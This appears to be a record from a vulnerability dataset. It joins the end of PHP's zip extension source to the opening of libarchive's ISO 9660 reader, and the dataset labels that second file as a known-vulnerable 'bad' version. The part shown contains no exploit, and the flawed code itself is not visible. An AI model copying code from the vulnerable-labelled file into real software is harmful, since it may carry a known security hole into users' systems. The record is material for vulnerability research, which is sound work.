ZIPARCHIVE_ME(getCommentName, arginfo_ziparchive_getcommentname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(deleteIndex, arginfo_ziparchive_unchangeindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(deleteName, arginfo_ziparchive_unchangename, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(statName, arginfo_ziparchive_statname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(statIndex, arginfo_ziparchive_statindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(locateName, arginfo_ziparchive_statname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getNameIndex, arginfo_ziparchive_statindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(unchangeArchive, arginfo_ziparchive__void, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(unchangeAll, arginfo_ziparchive__void, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(unchangeIndex, arginfo_ziparchive_unchangeindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(unchangeName, arginfo_ziparchive_unchangename, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(extractTo, arginfo_ziparchive_extractto, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getFromName, arginfo_ziparchive_getfromname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getFromIndex, arginfo_ziparchive_getfromindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getStream, arginfo_ziparchive_getstream, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setExternalAttributesName, arginfo_ziparchive_setextattrname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setExternalAttributesIndex, arginfo_ziparchive_setextattrindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getExternalAttributesName, arginfo_ziparchive_getextattrname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(getExternalAttributesIndex, arginfo_ziparchive_getextattrindex, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setCompressionName, arginfo_ziparchive_setcompname, ZEND_ACC_PUBLIC)
ZIPARCHIVE_ME(setCompressionIndex, arginfo_ziparchive_setcompindex, ZEND_ACC_PUBLIC)
{NULL, NULL, NULL}
};
/* }}} */
static void php_zip_free_prop_handler(zval *el) /* {{{ */ {
pefree(Z_PTR_P(el), 1);
} /* }}} */
/* {{{ PHP_MINIT_FUNCTION */
static PHP_MINIT_FUNCTION(zip)
{
zend_class_entry ce;
memcpy(&zip_object_handlers, zend_get_std_object_handlers(), sizeof(zend_object_handlers));
zip_object_handlers.offset = XtOffsetOf(ze_zip_object, zo);
zip_object_handlers.free_obj = php_zip_object_free_storage;
zip_object_handlers.clone_obj = NULL;
zip_object_handlers.get_property_ptr_ptr = php_zip_get_property_ptr_ptr;
zip_object_handlers.get_properties = php_zip_get_properties;
zip_object_handlers.read_property = php_zip_read_property;
zip_object_handlers.has_property = php_zip_has_property;
INIT_CLASS_ENTRY(ce, "ZipArchive", zip_class_functions);
ce.create_object = php_zip_object_new;
zip_class_entry = zend_register_internal_class(&ce);
zend_hash_init(&zip_prop_handlers, 0, NULL, php_zip_free_prop_handler, 1);
php_zip_register_prop_handler(&zip_prop_handlers, "status", php_zip_status, NULL, NULL, IS_LONG);
php_zip_register_prop_handler(&zip_prop_handlers, "statusSys", php_zip_status_sys, NULL, NULL, IS_LONG);
php_zip_register_prop_handler(&zip_prop_handlers, "numFiles", php_zip_get_num_files, NULL, NULL, IS_LONG);
php_zip_register_prop_handler(&zip_prop_handlers, "filename", NULL, NULL, php_zipobj_get_filename, IS_STRING);
php_zip_register_prop_handler(&zip_prop_handlers, "comment", NULL, php_zipobj_get_zip_comment, NULL, IS_STRING);
REGISTER_ZIP_CLASS_CONST_LONG("CREATE", ZIP_CREATE);
REGISTER_ZIP_CLASS_CONST_LONG("EXCL", ZIP_EXCL);
REGISTER_ZIP_CLASS_CONST_LONG("CHECKCONS", ZIP_CHECKCONS);
REGISTER_ZIP_CLASS_CONST_LONG("OVERWRITE", ZIP_OVERWRITE);
REGISTER_ZIP_CLASS_CONST_LONG("FL_NOCASE", ZIP_FL_NOCASE);
REGISTER_ZIP_CLASS_CONST_LONG("FL_NODIR", ZIP_FL_NODIR);
REGISTER_ZIP_CLASS_CONST_LONG("FL_COMPRESSED", ZIP_FL_COMPRESSED);
REGISTER_ZIP_CLASS_CONST_LONG("FL_UNCHANGED", ZIP_FL_UNCHANGED);
REGISTER_ZIP_CLASS_CONST_LONG("CM_DEFAULT", ZIP_CM_DEFAULT);
REGISTER_ZIP_CLASS_CONST_LONG("CM_STORE", ZIP_CM_STORE);
REGISTER_ZIP_CLASS_CONST_LONG("CM_SHRINK", ZIP_CM_SHRINK);
REGISTER_ZIP_CLASS_CONST_LONG("CM_REDUCE_1", ZIP_CM_REDUCE_1);
REGISTER_ZIP_CLASS_CONST_LONG("CM_REDUCE_2", ZIP_CM_REDUCE_2);
REGISTER_ZIP_CLASS_CONST_LONG("CM_REDUCE_3", ZIP_CM_REDUCE_3);
REGISTER_ZIP_CLASS_CONST_LONG("CM_REDUCE_4", ZIP_CM_REDUCE_4);
REGISTER_ZIP_CLASS_CONST_LONG("CM_IMPLODE", ZIP_CM_IMPLODE);
REGISTER_ZIP_CLASS_CONST_LONG("CM_DEFLATE", ZIP_CM_DEFLATE);
REGISTER_ZIP_CLASS_CONST_LONG("CM_DEFLATE64", ZIP_CM_DEFLATE64);
REGISTER_ZIP_CLASS_CONST_LONG("CM_PKWARE_IMPLODE", ZIP_CM_PKWARE_IMPLODE);
REGISTER_ZIP_CLASS_CONST_LONG("CM_BZIP2", ZIP_CM_BZIP2);
REGISTER_ZIP_CLASS_CONST_LONG("CM_LZMA", ZIP_CM_LZMA);
REGISTER_ZIP_CLASS_CONST_LONG("CM_TERSE", ZIP_CM_TERSE);
REGISTER_ZIP_CLASS_CONST_LONG("CM_LZ77", ZIP_CM_LZ77);
REGISTER_ZIP_CLASS_CONST_LONG("CM_WAVPACK", ZIP_CM_WAVPACK);
REGISTER_ZIP_CLASS_CONST_LONG("CM_PPMD", ZIP_CM_PPMD);
/* Error code */
REGISTER_ZIP_CLASS_CONST_LONG("ER_OK", ZIP_ER_OK); /* N No error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_MULTIDISK", ZIP_ER_MULTIDISK); /* N Multi-disk zip archives not supported */
REGISTER_ZIP_CLASS_CONST_LONG("ER_RENAME", ZIP_ER_RENAME); /* S Renaming temporary file failed */
REGISTER_ZIP_CLASS_CONST_LONG("ER_CLOSE", ZIP_ER_CLOSE); /* S Closing zip archive failed */
REGISTER_ZIP_CLASS_CONST_LONG("ER_SEEK", ZIP_ER_SEEK); /* S Seek error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_READ", ZIP_ER_READ); /* S Read error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_WRITE", ZIP_ER_WRITE); /* S Write error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_CRC", ZIP_ER_CRC); /* N CRC error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_ZIPCLOSED", ZIP_ER_ZIPCLOSED); /* N Containing zip archive was closed */
REGISTER_ZIP_CLASS_CONST_LONG("ER_NOENT", ZIP_ER_NOENT); /* N No such file */
REGISTER_ZIP_CLASS_CONST_LONG("ER_EXISTS", ZIP_ER_EXISTS); /* N File already exists */
REGISTER_ZIP_CLASS_CONST_LONG("ER_OPEN", ZIP_ER_OPEN); /* S Can't open file */
REGISTER_ZIP_CLASS_CONST_LONG("ER_TMPOPEN", ZIP_ER_TMPOPEN); /* S Failure to create temporary file */
REGISTER_ZIP_CLASS_CONST_LONG("ER_ZLIB", ZIP_ER_ZLIB); /* Z Zlib error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_MEMORY", ZIP_ER_MEMORY); /* N Malloc failure */
REGISTER_ZIP_CLASS_CONST_LONG("ER_CHANGED", ZIP_ER_CHANGED); /* N Entry has been changed */
REGISTER_ZIP_CLASS_CONST_LONG("ER_COMPNOTSUPP", ZIP_ER_COMPNOTSUPP);/* N Compression method not supported */
REGISTER_ZIP_CLASS_CONST_LONG("ER_EOF", ZIP_ER_EOF); /* N Premature EOF */
REGISTER_ZIP_CLASS_CONST_LONG("ER_INVAL", ZIP_ER_INVAL); /* N Invalid argument */
REGISTER_ZIP_CLASS_CONST_LONG("ER_NOZIP", ZIP_ER_NOZIP); /* N Not a zip archive */
REGISTER_ZIP_CLASS_CONST_LONG("ER_INTERNAL", ZIP_ER_INTERNAL); /* N Internal error */
REGISTER_ZIP_CLASS_CONST_LONG("ER_INCONS", ZIP_ER_INCONS); /* N Zip archive inconsistent */
REGISTER_ZIP_CLASS_CONST_LONG("ER_REMOVE", ZIP_ER_REMOVE); /* S Can't remove file */
REGISTER_ZIP_CLASS_CONST_LONG("ER_DELETED", ZIP_ER_DELETED); /* N Entry has been deleted */
#ifdef ZIP_OPSYS_DEFAULT
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_DOS", ZIP_OPSYS_DOS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_AMIGA", ZIP_OPSYS_AMIGA);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_OPENVMS", ZIP_OPSYS_OPENVMS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_UNIX", ZIP_OPSYS_UNIX);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_VM_CMS", ZIP_OPSYS_VM_CMS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_ATARI_ST", ZIP_OPSYS_ATARI_ST);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_OS_2", ZIP_OPSYS_OS_2);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_MACINTOSH", ZIP_OPSYS_MACINTOSH);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_Z_SYSTEM", ZIP_OPSYS_Z_SYSTEM);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_Z_CPM", ZIP_OPSYS_CPM);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_WINDOWS_NTFS", ZIP_OPSYS_WINDOWS_NTFS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_MVS", ZIP_OPSYS_MVS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_VSE", ZIP_OPSYS_VSE);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_ACORN_RISC", ZIP_OPSYS_ACORN_RISC);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_VFAT", ZIP_OPSYS_VFAT);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_ALTERNATE_MVS", ZIP_OPSYS_ALTERNATE_MVS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_BEOS", ZIP_OPSYS_BEOS);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_TANDEM", ZIP_OPSYS_TANDEM);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_OS_400", ZIP_OPSYS_OS_400);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_OS_X", ZIP_OPSYS_OS_X);
REGISTER_ZIP_CLASS_CONST_LONG("OPSYS_DEFAULT", ZIP_OPSYS_DEFAULT);
#endif /* ifdef ZIP_OPSYS_DEFAULT */
php_register_url_stream_wrapper("zip", &php_stream_zip_wrapper);
le_zip_dir = zend_register_list_destructors_ex(php_zip_free_dir, NULL, le_zip_dir_name, module_number);
le_zip_entry = zend_register_list_destructors_ex(php_zip_free_entry, NULL, le_zip_entry_name, module_number);
return SUCCESS;
}
/* }}} */
/* {{{ PHP_MSHUTDOWN_FUNCTION
*/
static PHP_MSHUTDOWN_FUNCTION(zip)
{
zend_hash_destroy(&zip_prop_handlers);
php_unregister_url_stream_wrapper("zip");
return SUCCESS;
}
/* }}} */
/* {{{ PHP_MINFO_FUNCTION
*/
static PHP_MINFO_FUNCTION(zip)
{
php_info_print_table_start();
php_info_print_table_row(2, "Zip", "enabled");
php_info_print_table_row(2, "Zip version", PHP_ZIP_VERSION);
php_info_print_table_row(2, "Libzip version", LIBZIP_VERSION);
php_info_print_table_end();
}
/* }}} */
/*
* Local variables:
* tab-width: 4
* c-basic-offset: 4
* End:
* vim600: noet sw=4 ts=4 fdm=marker
* vim<600: noet sw=4 ts=4
*/
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_4988_0 |
crossvul-cpp_data_bad_5181_0 | /*-
* Copyright (c) 2003-2007 Tim Kientzle
* Copyright (c) 2009 Andreas Henriksson <andreas@fatal.se>
* Copyright (c) 2009-2012 Michihiro NAKAJIMA
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR(S) ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "archive_platform.h"
__FBSDID("$FreeBSD: head/lib/libarchive/archive_read_support_format_iso9660.c 201246 2009-12-30 05:30:35Z kientzle $");
#ifdef HAVE_ERRNO_H
#include <errno.h>
#endif
/* #include <stdint.h> */ /* See archive_platform.h */
#include <stdio.h>
#ifdef HAVE_STDLIB_H
#include <stdlib.h>
#endif
#ifdef HAVE_STRING_H
#include <string.h>
#endif
#include <time.h>
#ifdef HAVE_ZLIB_H
#include <zlib.h>
#endif
#include "archive.h"
#include "archive_endian.h"
#include "archive_entry.h"
#include "archive_entry_locale.h"
#include "archive_private.h"
#include "archive_read_private.h"
#include "archive_string.h"
/*
* An overview of ISO 9660 format:
*
* Each disk is laid out as follows:
* * 32k reserved for private use
* * Volume descriptor table. Each volume descriptor
* is 2k and specifies basic format information.
* The "Primary Volume Descriptor" (PVD) is defined by the
* standard and should always be present; other volume
* descriptors include various vendor-specific extensions.
* * Files and directories. Each file/dir is specified by
* an "extent" (starting sector and length in bytes).
* Dirs are just files with directory records packed one
* after another. The PVD contains a single dir entry
* specifying the location of the root directory. Everything
* else follows from there.
*
* This module works by first reading the volume descriptors, then
* building a list of directory entries, sorted by starting
* sector. At each step, I look for the earliest dir entry that
* hasn't yet been read, seek forward to that location and read
* that entry. If it's a dir, I slurp in the new dir entries and
* add them to the heap; if it's a regular file, I return the
* corresponding archive_entry and wait for the client to request
* the file body. This strategy allows us to read most compliant
* CDs with a single pass through the data, as required by libarchive.
*/
#define LOGICAL_BLOCK_SIZE 2048
#define SYSTEM_AREA_BLOCK 16
/* Structure of on-disk primary volume descriptor. */
#define PVD_type_offset 0
#define PVD_type_size 1
#define PVD_id_offset (PVD_type_offset + PVD_type_size)
#define PVD_id_size 5
#define PVD_version_offset (PVD_id_offset + PVD_id_size)
#define PVD_version_size 1
#define PVD_reserved1_offset (PVD_version_offset + PVD_version_size)
#define PVD_reserved1_size 1
#define PVD_system_id_offset (PVD_reserved1_offset + PVD_reserved1_size)
#define PVD_system_id_size 32
#define PVD_volume_id_offset (PVD_system_id_offset + PVD_system_id_size)
#define PVD_volume_id_size 32
#define PVD_reserved2_offset (PVD_volume_id_offset + PVD_volume_id_size)
#define PVD_reserved2_size 8
#define PVD_volume_space_size_offset (PVD_reserved2_offset + PVD_reserved2_size)
#define PVD_volume_space_size_size 8
#define PVD_reserved3_offset (PVD_volume_space_size_offset + PVD_volume_space_size_size)
#define PVD_reserved3_size 32
#define PVD_volume_set_size_offset (PVD_reserved3_offset + PVD_reserved3_size)
#define PVD_volume_set_size_size 4
#define PVD_volume_sequence_number_offset (PVD_volume_set_size_offset + PVD_volume_set_size_size)
#define PVD_volume_sequence_number_size 4
#define PVD_logical_block_size_offset (PVD_volume_sequence_number_offset + PVD_volume_sequence_number_size)
#define PVD_logical_block_size_size 4
#define PVD_path_table_size_offset (PVD_logical_block_size_offset + PVD_logical_block_size_size)
#define PVD_path_table_size_size 8
#define PVD_type_1_path_table_offset (PVD_path_table_size_offset + PVD_path_table_size_size)
#define PVD_type_1_path_table_size 4
#define PVD_opt_type_1_path_table_offset (PVD_type_1_path_table_offset + PVD_type_1_path_table_size)
#define PVD_opt_type_1_path_table_size 4
#define PVD_type_m_path_table_offset (PVD_opt_type_1_path_table_offset + PVD_opt_type_1_path_table_size)
#define PVD_type_m_path_table_size 4
#define PVD_opt_type_m_path_table_offset (PVD_type_m_path_table_offset + PVD_type_m_path_table_size)
#define PVD_opt_type_m_path_table_size 4
#define PVD_root_directory_record_offset (PVD_opt_type_m_path_table_offset + PVD_opt_type_m_path_table_size)
#define PVD_root_directory_record_size 34
#define PVD_volume_set_id_offset (PVD_root_directory_record_offset + PVD_root_directory_record_size)
#define PVD_volume_set_id_size 128
#define PVD_publisher_id_offset (PVD_volume_set_id_offset + PVD_volume_set_id_size)
#define PVD_publisher_id_size 128
#define PVD_preparer_id_offset (PVD_publisher_id_offset + PVD_publisher_id_size)
#define PVD_preparer_id_size 128
#define PVD_application_id_offset (PVD_preparer_id_offset + PVD_preparer_id_size)
#define PVD_application_id_size 128
#define PVD_copyright_file_id_offset (PVD_application_id_offset + PVD_application_id_size)
#define PVD_copyright_file_id_size 37
#define PVD_abstract_file_id_offset (PVD_copyright_file_id_offset + PVD_copyright_file_id_size)
#define PVD_abstract_file_id_size 37
#define PVD_bibliographic_file_id_offset (PVD_abstract_file_id_offset + PVD_abstract_file_id_size)
#define PVD_bibliographic_file_id_size 37
#define PVD_creation_date_offset (PVD_bibliographic_file_id_offset + PVD_bibliographic_file_id_size)
#define PVD_creation_date_size 17
#define PVD_modification_date_offset (PVD_creation_date_offset + PVD_creation_date_size)
#define PVD_modification_date_size 17
#define PVD_expiration_date_offset (PVD_modification_date_offset + PVD_modification_date_size)
#define PVD_expiration_date_size 17
#define PVD_effective_date_offset (PVD_expiration_date_offset + PVD_expiration_date_size)
#define PVD_effective_date_size 17
#define PVD_file_structure_version_offset (PVD_effective_date_offset + PVD_effective_date_size)
#define PVD_file_structure_version_size 1
#define PVD_reserved4_offset (PVD_file_structure_version_offset + PVD_file_structure_version_size)
#define PVD_reserved4_size 1
#define PVD_application_data_offset (PVD_reserved4_offset + PVD_reserved4_size)
#define PVD_application_data_size 512
#define PVD_reserved5_offset (PVD_application_data_offset + PVD_application_data_size)
#define PVD_reserved5_size (2048 - PVD_reserved5_offset)
/* TODO: It would make future maintenance easier to just hardcode the
* above values. In particular, ECMA119 states the offsets as part of
* the standard. That would eliminate the need for the following check.*/
#if PVD_reserved5_offset != 1395
#error PVD offset and size definitions are wrong.
#endif
/* Structure of optional on-disk supplementary volume descriptor. */
#define SVD_type_offset 0
#define SVD_type_size 1
#define SVD_id_offset (SVD_type_offset + SVD_type_size)
#define SVD_id_size 5
#define SVD_version_offset (SVD_id_offset + SVD_id_size)
#define SVD_version_size 1
/* ... */
#define SVD_reserved1_offset 72
#define SVD_reserved1_size 8
#define SVD_volume_space_size_offset 80
#define SVD_volume_space_size_size 8
#define SVD_escape_sequences_offset (SVD_volume_space_size_offset + SVD_volume_space_size_size)
#define SVD_escape_sequences_size 32
/* ... */
#define SVD_logical_block_size_offset 128
#define SVD_logical_block_size_size 4
#define SVD_type_L_path_table_offset 140
#define SVD_type_M_path_table_offset 148
/* ... */
#define SVD_root_directory_record_offset 156
#define SVD_root_directory_record_size 34
#define SVD_file_structure_version_offset 881
#define SVD_reserved2_offset 882
#define SVD_reserved2_size 1
#define SVD_reserved3_offset 1395
#define SVD_reserved3_size 653
/* ... */
/* FIXME: validate correctness of last SVD entry offset. */
/* Structure of an on-disk directory record. */
/* Note: ISO9660 stores each multi-byte integer twice, once in
* each byte order. The sizes here are the size of just one
* of the two integers. (This is why the offset of a field isn't
* the same as the offset+size of the previous field.) */
#define DR_length_offset 0
#define DR_length_size 1
#define DR_ext_attr_length_offset 1
#define DR_ext_attr_length_size 1
#define DR_extent_offset 2
#define DR_extent_size 4
#define DR_size_offset 10
#define DR_size_size 4
#define DR_date_offset 18
#define DR_date_size 7
#define DR_flags_offset 25
#define DR_flags_size 1
#define DR_file_unit_size_offset 26
#define DR_file_unit_size_size 1
#define DR_interleave_offset 27
#define DR_interleave_size 1
#define DR_volume_sequence_number_offset 28
#define DR_volume_sequence_number_size 2
#define DR_name_len_offset 32
#define DR_name_len_size 1
#define DR_name_offset 33
#ifdef HAVE_ZLIB_H
static const unsigned char zisofs_magic[8] = {
0x37, 0xE4, 0x53, 0x96, 0xC9, 0xDB, 0xD6, 0x07
};
struct zisofs {
/* Set 1 if this file compressed by paged zlib */
int pz;
int pz_log2_bs; /* Log2 of block size */
uint64_t pz_uncompressed_size;
int initialized;
unsigned char *uncompressed_buffer;
size_t uncompressed_buffer_size;
uint32_t pz_offset;
unsigned char header[16];
size_t header_avail;
int header_passed;
unsigned char *block_pointers;
size_t block_pointers_alloc;
size_t block_pointers_size;
size_t block_pointers_avail;
size_t block_off;
uint32_t block_avail;
z_stream stream;
int stream_valid;
};
#else
struct zisofs {
/* Set 1 if this file compressed by paged zlib */
int pz;
};
#endif
struct content {
uint64_t offset;/* Offset on disk. */
uint64_t size; /* File size in bytes. */
struct content *next;
};
/* In-memory storage for a directory record. */
struct file_info {
struct file_info *use_next;
struct file_info *parent;
struct file_info *next;
struct file_info *re_next;
int subdirs;
uint64_t key; /* Heap Key. */
uint64_t offset; /* Offset on disk. */
uint64_t size; /* File size in bytes. */
uint32_t ce_offset; /* Offset of CE. */
uint32_t ce_size; /* Size of CE. */
char rr_moved; /* Flag to rr_moved. */
char rr_moved_has_re_only;
char re; /* Having RRIP "RE" extension. */
char re_descendant;
uint64_t cl_offset; /* Having RRIP "CL" extension. */
int birthtime_is_set;
time_t birthtime; /* File created time. */
time_t mtime; /* File last modified time. */
time_t atime; /* File last accessed time. */
time_t ctime; /* File attribute change time. */
uint64_t rdev; /* Device number. */
mode_t mode;
uid_t uid;
gid_t gid;
int64_t number;
int nlinks;
struct archive_string name; /* Pathname */
unsigned char *utf16be_name;
size_t utf16be_bytes;
char name_continues; /* Non-zero if name continues */
struct archive_string symlink;
char symlink_continues; /* Non-zero if link continues */
/* Set 1 if this file compressed by paged zlib(zisofs) */
int pz;
int pz_log2_bs; /* Log2 of block size */
uint64_t pz_uncompressed_size;
/* Set 1 if this file is multi extent. */
int multi_extent;
struct {
struct content *first;
struct content **last;
} contents;
struct {
struct file_info *first;
struct file_info **last;
} rede_files;
};
struct heap_queue {
struct file_info **files;
int allocated;
int used;
};
struct iso9660 {
int magic;
#define ISO9660_MAGIC 0x96609660
int opt_support_joliet;
int opt_support_rockridge;
struct archive_string pathname;
char seenRockridge; /* Set true if RR extensions are used. */
char seenSUSP; /* Set true if SUSP is beging used. */
char seenJoliet;
unsigned char suspOffset;
struct file_info *rr_moved;
struct read_ce_queue {
struct read_ce_req {
uint64_t offset;/* Offset of CE on disk. */
struct file_info *file;
} *reqs;
int cnt;
int allocated;
} read_ce_req;
int64_t previous_number;
struct archive_string previous_pathname;
struct file_info *use_files;
struct heap_queue pending_files;
struct {
struct file_info *first;
struct file_info **last;
} cache_files;
struct {
struct file_info *first;
struct file_info **last;
} re_files;
uint64_t current_position;
ssize_t logical_block_size;
uint64_t volume_size; /* Total size of volume in bytes. */
int32_t volume_block;/* Total size of volume in logical blocks. */
struct vd {
int location; /* Location of Extent. */
uint32_t size;
} primary, joliet;
int64_t entry_sparse_offset;
int64_t entry_bytes_remaining;
size_t entry_bytes_unconsumed;
struct zisofs entry_zisofs;
struct content *entry_content;
struct archive_string_conv *sconv_utf16be;
/*
* Buffers for a full pathname in UTF-16BE in Joliet extensions.
*/
#define UTF16_NAME_MAX 1024
unsigned char *utf16be_path;
size_t utf16be_path_len;
unsigned char *utf16be_previous_path;
size_t utf16be_previous_path_len;
/* Null buufer used in bidder to improve its performance. */
unsigned char null[2048];
};
static int archive_read_format_iso9660_bid(struct archive_read *, int);
static int archive_read_format_iso9660_options(struct archive_read *,
const char *, const char *);
static int archive_read_format_iso9660_cleanup(struct archive_read *);
static int archive_read_format_iso9660_read_data(struct archive_read *,
const void **, size_t *, int64_t *);
static int archive_read_format_iso9660_read_data_skip(struct archive_read *);
static int archive_read_format_iso9660_read_header(struct archive_read *,
struct archive_entry *);
static const char *build_pathname(struct archive_string *, struct file_info *, int);
static int build_pathname_utf16be(unsigned char *, size_t, size_t *,
struct file_info *);
#if DEBUG
static void dump_isodirrec(FILE *, const unsigned char *isodirrec);
#endif
static time_t time_from_tm(struct tm *);
static time_t isodate17(const unsigned char *);
static time_t isodate7(const unsigned char *);
static int isBootRecord(struct iso9660 *, const unsigned char *);
static int isVolumePartition(struct iso9660 *, const unsigned char *);
static int isVDSetTerminator(struct iso9660 *, const unsigned char *);
static int isJolietSVD(struct iso9660 *, const unsigned char *);
static int isSVD(struct iso9660 *, const unsigned char *);
static int isEVD(struct iso9660 *, const unsigned char *);
static int isPVD(struct iso9660 *, const unsigned char *);
static int next_cache_entry(struct archive_read *, struct iso9660 *,
struct file_info **);
static int next_entry_seek(struct archive_read *, struct iso9660 *,
struct file_info **);
static struct file_info *
parse_file_info(struct archive_read *a,
struct file_info *parent, const unsigned char *isodirrec);
static int parse_rockridge(struct archive_read *a,
struct file_info *file, const unsigned char *start,
const unsigned char *end);
static int register_CE(struct archive_read *a, int32_t location,
struct file_info *file);
static int read_CE(struct archive_read *a, struct iso9660 *iso9660);
static void parse_rockridge_NM1(struct file_info *,
const unsigned char *, int);
static void parse_rockridge_SL1(struct file_info *,
const unsigned char *, int);
static void parse_rockridge_TF1(struct file_info *,
const unsigned char *, int);
static void parse_rockridge_ZF1(struct file_info *,
const unsigned char *, int);
static void register_file(struct iso9660 *, struct file_info *);
static void release_files(struct iso9660 *);
static unsigned toi(const void *p, int n);
static inline void re_add_entry(struct iso9660 *, struct file_info *);
static inline struct file_info * re_get_entry(struct iso9660 *);
static inline int rede_add_entry(struct file_info *);
static inline struct file_info * rede_get_entry(struct file_info *);
static inline void cache_add_entry(struct iso9660 *iso9660,
struct file_info *file);
static inline struct file_info *cache_get_entry(struct iso9660 *iso9660);
static int heap_add_entry(struct archive_read *a, struct heap_queue *heap,
struct file_info *file, uint64_t key);
static struct file_info *heap_get_entry(struct heap_queue *heap);
#define add_entry(arch, iso9660, file) \
heap_add_entry(arch, &((iso9660)->pending_files), file, file->offset)
#define next_entry(iso9660) \
heap_get_entry(&((iso9660)->pending_files))
int
archive_read_support_format_iso9660(struct archive *_a)
{
struct archive_read *a = (struct archive_read *)_a;
struct iso9660 *iso9660;
int r;
archive_check_magic(_a, ARCHIVE_READ_MAGIC,
ARCHIVE_STATE_NEW, "archive_read_support_format_iso9660");
iso9660 = (struct iso9660 *)calloc(1, sizeof(*iso9660));
if (iso9660 == NULL) {
archive_set_error(&a->archive, ENOMEM,
"Can't allocate iso9660 data");
return (ARCHIVE_FATAL);
}
iso9660->magic = ISO9660_MAGIC;
iso9660->cache_files.first = NULL;
iso9660->cache_files.last = &(iso9660->cache_files.first);
iso9660->re_files.first = NULL;
iso9660->re_files.last = &(iso9660->re_files.first);
/* Enable to support Joliet extensions by default. */
iso9660->opt_support_joliet = 1;
/* Enable to support Rock Ridge extensions by default. */
iso9660->opt_support_rockridge = 1;
r = __archive_read_register_format(a,
iso9660,
"iso9660",
archive_read_format_iso9660_bid,
archive_read_format_iso9660_options,
archive_read_format_iso9660_read_header,
archive_read_format_iso9660_read_data,
archive_read_format_iso9660_read_data_skip,
NULL,
archive_read_format_iso9660_cleanup,
NULL,
NULL);
if (r != ARCHIVE_OK) {
free(iso9660);
return (r);
}
return (ARCHIVE_OK);
}
static int
archive_read_format_iso9660_bid(struct archive_read *a, int best_bid)
{
struct iso9660 *iso9660;
ssize_t bytes_read;
const unsigned char *p;
int seenTerminator;
/* If there's already a better bid than we can ever
make, don't bother testing. */
if (best_bid > 48)
return (-1);
iso9660 = (struct iso9660 *)(a->format->data);
/*
* Skip the first 32k (reserved area) and get the first
* 8 sectors of the volume descriptor table. Of course,
* if the I/O layer gives us more, we'll take it.
*/
#define RESERVED_AREA (SYSTEM_AREA_BLOCK * LOGICAL_BLOCK_SIZE)
p = __archive_read_ahead(a,
RESERVED_AREA + 8 * LOGICAL_BLOCK_SIZE,
&bytes_read);
if (p == NULL)
return (-1);
/* Skip the reserved area. */
bytes_read -= RESERVED_AREA;
p += RESERVED_AREA;
/* Check each volume descriptor. */
seenTerminator = 0;
for (; bytes_read > LOGICAL_BLOCK_SIZE;
bytes_read -= LOGICAL_BLOCK_SIZE, p += LOGICAL_BLOCK_SIZE) {
/* Do not handle undefined Volume Descriptor Type. */
if (p[0] >= 4 && p[0] <= 254)
return (0);
/* Standard Identifier must be "CD001" */
